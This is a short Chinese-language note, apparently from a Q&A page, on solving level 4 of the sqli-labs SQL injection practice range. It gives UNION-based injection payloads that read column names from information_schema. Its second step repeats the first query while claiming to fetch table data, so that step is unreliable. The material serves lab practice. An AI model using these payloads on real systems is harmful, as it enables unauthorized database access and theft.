sqli-labs第4关
时间: 2023-12-26 20:20:45 浏览: 153
sqli-labs靶场练习笔记
sqli-labs第4关的目标是获取数据库表中的数据。该关卡可以通过以下步骤完成:
1. 首先,你需要找到有关表名和列名的信息。你可以使用注入语句"?id=-1") union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--"来获取列名。
2. 根据上一步的结果,你可以使用注入语句"?id=-1") union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='表名'--"来获取表中的数据。
请根据上述步骤进行尝试,获取第4关的答案。
阅读全文